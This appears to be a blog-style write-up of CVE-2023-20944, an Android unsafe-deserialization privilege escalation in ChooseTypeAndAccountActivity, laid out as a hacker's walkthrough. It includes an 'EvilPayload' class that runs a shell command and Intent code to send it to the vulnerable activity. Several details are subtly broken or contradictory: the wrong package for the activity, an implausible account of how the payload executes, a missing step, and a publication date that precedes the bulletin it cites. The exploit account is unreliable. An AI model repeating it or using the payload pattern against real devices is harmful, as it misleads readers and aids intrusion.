CVE CyberSecurity Database News

CVE-2023-20944 - Exploiting Unsafe Deserialization in ChooseTypeAndAccountActivity.java for Local Privilege Escalation on Android (A-244154558)

Poster -

CVE-2023-20944 is a serious Android security issue reported in the AccountManager’s ChooseTypeAndAccountActivity.java file, present in Android versions 10 through 13. It’s a bug caused by unsafe deserialization. It allows a local app—without special permissions or needing user help—to escalate privileges and potentially compromise system security.

Let’s walk you through how the flaw works, check the vulnerable code, and see how a hacker might exploit it. This guide is written in clear, plain language.

What is Unsafe Deserialization?

Deserialization means taking data (often from storage or another app) and converting it from a raw format back into an object the program can work with. When an app trusts what it reads and doesn’t check it, a crafty attacker can inject dangerous data. If the program naively deserializes this, it might run unwanted code or behave unpredictably.

Unsafe deserialization = a recipe for potential privilege escalation (becoming a higher-level user than you should be).

Versions Affected: Android 10, 11, 12, 12L, and 13

- Android Bug ID: A-244154558
- CVE: CVE-2023-20944

Original announcement:  
- Android Security Bulletin June 2023
- NVD details

What’s Vulnerable? The Code

The issue lies in how ChooseTypeAndAccountActivity handles Intent extras, specifically when deserializing data passed into the activity. Let’s look at a simplified example of vulnerable code:

// Snippet from ChooseTypeAndAccountActivity.java

Bundle bundle = getIntent().getBundleExtra("accountOptions");
Object options = bundle.getSerializable("options");

Why Is This Bad?

The code above accepts a Bundle provided via an Intent and calls getSerializable() with "options". If a malicious app sends a crafted Intent—with a dangerous class as the serialized data—the receiving activity will deserialize it. This opens the door for the attacker to trigger arbitrary code *as the target app's user*, gaining extra privileges.

1. Finding the Entry Point

Because ChooseTypeAndAccountActivity can be started from other local apps (it’s typically exported for legitimate AccountManager operations), it acts as an entry point.

2. Preparing the Payload

A malicious app prepares a custom Java class that implements Serializable with some unexpected and hostile logic. For example:

// Malicious payload class
public class EvilPayload implements Serializable {
    static {
        // This runs during deserialization!
        // Insert arbitrary code here -- like privilege escalation exploits
        Runtime.getRuntime().exec("id > /data/local/tmp/gotyou");
    }
}

The attacker’s app crafts a Bundle containing the serialized EvilPayload, then sends an intent

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.settings", "com.android.settings.ChooseTypeAndAccountActivity"));

Bundle bundle = new Bundle();
bundle.putSerializable("options", new EvilPayload());
intent.putExtra("accountOptions", bundle);

startActivity(intent); // Or sendActivity depending on API

4. The Unchecked Deserialization

When ChooseTypeAndAccountActivity runs, it picks up the intent, deserializes the data, and BOOM: the static initialization block in EvilPayload is executed, running the attacker’s malicious code as that user (potentially even SYSTEM in chained attacks).

5. No User Needed

The user never sees or touches anything—no prompt, no dialog. It’s a silent escalation, all local.

What Could the Attacker Gain?

- Escalated privileges: Hijack sensitive activities, perform actions as the user or possibly SYSTEM if chained with other exploits.

Protection: The Patch

Fixes in Android 13, and backported to earlier supported versions, limit what classes can be deserialized, or avoid using Java deserialization for incoming Intents altogether.

Advice: Always be careful when deserializing data from *untrusted sources*, even on your own device!

References

- Android Security Bulletin – June 2023
- CVE-2023-20944 NIST
- Google Issue Tracker: A-244154558 (restricted)

Wrapping Up

CVE-2023-20944 is a classic example of why developers must be strict about deserialization, especially with Intent data—never trust what you receive. If you’re using an older Android version, update as soon as your OEM provides patches.


Warning:  
This information is for educational purposes. Exploiting devices you don't own or have legal permission to test is illegal and unethical.

Timeline

Published on: 02/28/2023 17:15:00 UTC
Last modified on: 03/06/2023 19:39:00 UTC